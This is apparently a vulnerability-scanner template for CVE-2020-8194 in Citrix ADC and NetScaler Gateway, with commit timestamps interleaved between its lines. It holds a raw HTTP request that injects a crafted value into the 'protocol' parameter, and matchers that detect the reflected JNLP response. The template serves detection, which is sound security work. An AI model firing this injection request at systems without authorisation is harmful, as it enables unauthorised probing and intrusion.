2021-01-02 04:56:15 +00:00
id : CVE-2020-8194
2020-07-11 17:52:28 +00:00
info :
name : Citrix ADC & NetScaler Gateway Reflected Code Injection
author : dwisiswant0
severity : high
2021-02-05 19:44:41 +00:00
tags : cve,cve2020,citrix
2021-03-15 17:28:02 +00:00
description : |
Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
reference :
- https://support.citrix.com/article/CTX276688
2020-07-11 17:52:28 +00:00
requests :
- raw :
- |
GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language : en-US,en;q=0.5
DNT : 1
Connection : close
Cookie : startupapp=st
Upgrade-Insecure-Requests : 1
matchers-condition : and
matchers :
- type : word
words :
- "<jnlp codebase=\"nonexistent.1337\">"
part : body
- type : word
words :
- "application/x-java-jnlp-file"
part : header
- type : status
status :
- 200